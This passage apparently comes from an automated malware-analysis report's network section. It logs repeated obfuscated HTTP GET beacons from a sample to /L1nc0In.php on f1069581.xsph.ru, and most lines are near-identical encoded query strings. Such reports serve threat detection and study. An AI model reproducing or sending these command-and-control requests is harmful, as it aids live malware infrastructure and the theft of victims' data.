R2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&154d77d402106dff3d2a63610a8c9212=d1nIw4WSzh3RSZnUuJGcS5mY2p1RkVnVtJmdChlY25URYNmQYJGbSZEWjh3VZpWOHR1Y4ZVWwY0RSdnQYF1Y4FzY1lTbaNnRHh1YO52Ys5EWWNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIlhDZlVTYlRDOyUzMmZWM2QGOzMGOzATN4cDN4MjMiNzY2UGMzUGOxIiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNm